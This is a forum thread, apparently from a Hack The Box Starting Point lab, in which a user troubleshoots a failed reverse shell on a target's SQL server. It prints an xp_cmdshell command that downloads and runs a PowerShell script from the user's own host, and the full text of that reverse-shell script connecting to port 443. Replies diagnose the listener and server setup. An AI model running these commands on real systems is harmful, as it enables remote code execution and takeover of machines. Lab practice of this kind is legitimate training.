Problem in Starting point machine(10.10.10.27)

HTB Content Machines
1

SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.48/shell.ps1\“);”
output

New-Object : Exception calling “.ctor” with “2” argument(s): "No connection could be made because the target machine

actively refused it 10.10.14.48:443"

At line:2 char:11

  • $client = New-Object System.Net.Sockets.TCPClient(“10.10.14.48”,443); …

  •       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    • CategoryInfo : InvalidOperation: (:slight_smile: [New-Object], MethodInvocationException

    • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand
      You cannot call a method on a null-valued expression.
      At line:2 char:70

  • … ts.TCPClient(“10.10.14.48”,443);$stream = $client.GetStream();[byte

  •                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull
      You cannot call a method on a null-valued expression.
      At line:2 char:138

  • … 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) …

  •                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:464

  • … .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  •                                                       ~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull
      NULL

The shell.ps1 that i used== $client = New-Object System.Net.Sockets.TCPClient(“10.10.14.48”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Tried rectifying the issue but cant. Any help would be appreciated. Thanks

2

As your output states:

"No connection could be made because the target machine
actively refused it 10.10.14.48:443"
  1. On ur machine, did u start ur local http server using the code:
python3 -m http.server 80

u need to leave it and perform the rest of instructions in another console.

  1. You also need to make sure 10.10.14.48 is ur local machine ip in the HTB network.

  2. Your firewall setting might also be the reason connection is refused.

3
  1. Yes the http server was started using the command == python3 -m http.server 80 --bind 10.10.14.48
  2. Yes I did ifconfig to get the ip of tun0 and the ip was the one that I used in the script and command both.
  3. I dont have any firewall running thats why I skipped the ufw step.
  4. I think the problem is with the netcat listner at 443 port because as soon as I execute it crashes.
4

Type your comment> @kingpin10 said:

  1. I think the problem is with the netcat listner at 443 port because as soon as I execute it crashes.

what the program output?

5

I have the same issue, but netcat listener do not crash. What can I do?